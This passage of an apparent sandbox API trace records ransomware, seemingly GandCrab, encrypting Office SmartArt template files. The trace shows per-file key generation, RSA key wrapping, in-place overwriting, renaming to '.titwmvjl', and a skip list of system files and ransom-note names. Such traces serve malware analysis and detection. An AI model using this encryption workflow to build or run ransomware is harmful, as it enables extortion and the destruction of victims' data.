[0078.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.194] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.194] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034b8) returned 1 [0078.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.194] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.195] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.195] GetLastError () returned 0x0 [0078.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.195] CryptDestroyKey (hKey=0x5034b8) returned 1 [0078.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.195] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.195] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.196] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.196] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.196] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.196] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.197] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.197] GetLastError () returned 0x0 [0078.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.197] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.197] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.197] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.197] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0078.198] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0078.198] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x1697, lpOverlapped=0x0) returned 1 [0078.207] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffe969, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.207] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1697, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x1697, lpOverlapped=0x0) returned 1 [0078.212] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.212] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.214] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.219] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.219] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.219] CloseHandle (hObject=0x2ec) returned 1 [0078.227] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328884[[fn=architecture]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328884[[fn=architecture]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.228] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.228] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.228] lstrcmpW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2=".") returned 1 [0078.228] lstrcmpW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="..") returned 1 [0078.228] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328893[[fn=BracketList]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox" [0078.228] lstrlenW (lpString=".titwmvjl") returned 9 [0078.228] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0078.228] VirtualAlloc (lpAddress=0x0, dwSize=0x152, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.229] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox.titwmvjl") returned 146 [0078.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0078.229] lstrlenW (lpString=".glox") returned 5 [0078.229] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.229] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.229] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.229] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0078.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="desktop.ini") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="autorun.inf") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="ntuser.dat") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="iconcache.db") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="bootsect.bak") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="boot.ini") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="ntuser.dat.log") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="thumbs.db") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.229] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.230] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.230] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.230] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.230] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.230] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="ntldr") returned 1 [0078.230] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="NTDETECT.COM") returned 1 [0078.230] lstrcmpiW (lpString1="TM03328893[[fn=BracketList]].glox", lpString2="Bootfont.bin") returned 1 [0078.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox") returned 137 [0078.230] lstrlenW (lpString=".glox") returned 5 [0078.230] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.230] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.230] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.230] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.230] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328893[[fn=bracketlist]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.231] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.231] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.244] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.244] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.244] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.245] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.245] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.245] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.245] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.245] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.245] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.246] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.246] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.246] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.246] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.246] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.246] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.247] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.247] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.247] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.248] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034b8) returned 1 [0078.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.248] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.248] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.248] GetLastError () returned 0x0 [0078.248] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.248] CryptDestroyKey (hKey=0x5034b8) returned 1 [0078.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.249] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.249] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.249] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.250] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.250] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.250] GetLastError () returned 0x0 [0078.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.250] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.250] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.251] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0078.251] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0078.251] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0xfba, lpOverlapped=0x0) returned 1 [0078.257] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffff046, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.257] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xfba, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0xfba, lpOverlapped=0x0) returned 1 [0078.258] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.258] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.260] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.263] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.264] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.264] CloseHandle (hObject=0x2ec) returned 1 [0078.265] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328893[[fn=bracketlist]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328893[[fn=BracketList]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328893[[fn=bracketlist]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.266] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.266] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.266] lstrcmpW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2=".") returned 1 [0078.266] lstrcmpW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="..") returned 1 [0078.266] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328905[[fn=Chevron Accent]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox" [0078.266] lstrlenW (lpString=".titwmvjl") returned 9 [0078.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0078.266] VirtualAlloc (lpAddress=0x0, dwSize=0x158, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.266] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox.titwmvjl") returned 149 [0078.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0078.266] lstrlenW (lpString=".glox") returned 5 [0078.266] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.267] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.267] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.267] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0078.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="desktop.ini") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="autorun.inf") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="ntuser.dat") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="iconcache.db") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="bootsect.bak") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="boot.ini") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="ntuser.dat.log") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="thumbs.db") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="ntldr") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="NTDETECT.COM") returned 1 [0078.267] lstrcmpiW (lpString1="TM03328905[[fn=Chevron Accent]].glox", lpString2="Bootfont.bin") returned 1 [0078.267] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox") returned 140 [0078.267] lstrlenW (lpString=".glox") returned 5 [0078.267] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.268] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.268] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.268] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.268] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328905[[fn=Chevron Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328905[[fn=chevron accent]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.268] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.269] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.279] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.279] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.280] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.280] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.280] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.280] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.280] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.281] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.281] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.281] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.281] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.281] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.282] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.282] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.282] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.282] CryptReleaseContext 